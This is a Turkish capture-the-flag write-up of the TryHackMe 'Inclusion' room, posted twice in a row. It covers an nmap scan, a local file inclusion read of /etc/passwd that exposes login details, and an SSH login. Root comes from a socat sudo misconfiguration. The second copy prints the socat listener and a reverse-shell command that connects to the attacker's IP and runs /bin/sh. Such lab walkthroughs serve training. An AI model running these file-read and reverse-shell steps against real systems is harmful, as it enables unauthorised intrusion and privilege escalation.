Eren Yılmaz tarafından yazılmıştır.
Merhaba, bu makalemde tryhackme’de bulunan “Inclusion” isimli odayı hep beraber çözeceğiz ve yorumlayacağız. Hadi hemen başlayalım.
Oda: https://tryhackme.com/room/inclusion
Makinemizi dağıttıktan sonra bilgi toplamak için nmap’i çalıştırabiliriz.
nmap
Gördüğümüz üzere ayakta 2 adet bağlantı noktası var. Bunlardan ilki 22 numaralı bağlantı noktası, içerisinde ssh servisi çalışıyor. İkincisi ise 80 numaralı bağlantı noktası, içerisinde http servisi çalışıyor yani bir web sitesi. Başlamak için ssh servisi kullanıcı ismi ve şifre talep ettiğinden dolayı web sayfasıyla başlıyoruz.
Web sitesine girdiğimizde bizi bir blog karşılıyor. Buradaki yazıları okuduğumda ben LFI-atack yazısını ilgi çekici buluyorum, hemen girelim.
lfi-makale
Bu makalede lfi açığı anlatılıyor, web sayfasını url kısmına baktığımızda bu sayfada lfi olma olasılığının olduğunu görüyoruz, ne kadar ironik değil mi . Hadi bir deneme yapalım.
passwd
Bu url’de lfi açığından faydalanarak etc dizininde olan passwd dosyasını okuyorum. Passwd dosyasında sistemdeki kullanıcıların kullanıcı isimleri gibi bir çok bilgi bulunur. Burada bir kullanıcının giriş bilgileri verilmiş.
O kişi falconefeast ve dikkatimi çekiyor, hadi bu bilgiler ile ssh servisine giriş yapalım.
Şifreyi de girip giriş yapıyoruz.
ssh
User flagını okuyalım.
user.txt
root bayrağını almamız için yetkimizi yükseltmemiz gerek, ilk önce yetkimize bir göz atalım.
sudo-l
socat dizini şifresiz olarak root hakkına erişebiliyor. Bunu istismar edebiliriz, ben şu an yapacağımız işlem için kaynak olarak bu blog yazısını aldım. https://gtfobins.github.io/gtfobins/socat/
İstismar işlemi için önce kendi makinemizi aşağıda vereceğim komut ile dinleme moduna alıyoruz.
Sonra karşı makineye sihirli komutları yazıyoruz.
Ve reverse shell’imizi almış oluyoruz. Hadi root bayrağını okuyalım.
root.txt
Makalem bu kadardı, daha fazla içerik için sitemizi takip edebilirsiniz.
[TR] Inclusion WriteUp | TryHackMe
Merhaba, bu makalemde tryhackme’de bulunan “Inclusion” isimli odayı hep beraber çözeceğiz ve yorumlayacağız. Hadi hemen başlayalım.
Oda: https://tryhackme.com/room/inclusion
Task 2 Root It
Bilgi toplama:
Makinemizi dağıttıktan sonra bilgi toplamak için nmap’i çalıştırabiliriz.
sudo nmap -A 10.10.120.135
nmap
Gördüğümüz üzere ayakta 2 adet bağlantı noktası var. Bunlardan ilki 22 numaralı bağlantı noktası, içerisinde ssh servisi çalışıyor. İkincisi ise 80 numaralı bağlantı noktası, içerisinde http servisi çalışıyor yani bir web sitesi. Başlamak için ssh servisi kullanıcı ismi ve şifre talep ettiğinden dolayı web sayfasıyla başlıyoruz.
Web sitesine girdiğimizde bizi bir blog karşılıyor. Buradaki yazıları okuduğumda ben LFI-atack yazısını ilgi çekici buluyorum, hemen girelim.
lfi-makale
Bu makalede lfi açığı anlatılıyor, web sayfasını url kısmına baktığımızda bu sayfada lfi olma olasılığının olduğunu görüyoruz, ne kadar ironik değil mi . Hadi bir deneme yapalım.
passwd
Bu url’de lfi açığından faydalanarak etc dizininde olan passwd dosyasını okuyorum. Passwd dosyasında sistemdeki kullanıcıların kullanıcı isimleri gibi bir çok bilgi bulunur. Burada bir kullanıcının giriş bilgileri verilmiş.
O kişi falconefeast ve dikkatimi çekiyor, hadi bu bilgiler ile ssh servisine giriş yapalım.
Şifreyi de girip giriş yapıyoruz.
ssh
Sömürme
User flagını okuyalım.
cat user.txt
user.txt
Yetki Yükseltme
root bayrağını almamız için yetkimizi yükseltmemiz gerek, ilk önce yetkimize bir göz atalım.
sudo -l
sudo-l
socat dizini şifresiz olarak root hakkına erişebiliyor. Bunu istismar edebiliriz, ben şu an yapacağımız işlem için kaynak olarak bu blog yazısını aldım. https://gtfobins.github.io/gtfobins/socat/
İstismar işlemi için önce kendi makinemizi aşağıda vereceğim komut ile dinleme moduna alıyoruz.
socat file:`tty`,raw,echo=0 tcp-listen:3032
Sonra karşı makineye sihirli komutları yazıyoruz.
sudo socat tcp-connect:10.8.52.178:3032 exec:/bin/sh,pty,stderr,setsid,sigint,sane
Ve reverse shell’imizi almış oluyoruz. Hadi root bayrağını okuyalım.
cat /root/root.txt
root.txt
Makalem bu kadardı, daha fazla içerik için sitemizi takip edebilirsiniz.
Walkthrough arşivleri - PwnLab.Me
pwnlab.me
Moderatör tarafında düzenlendi: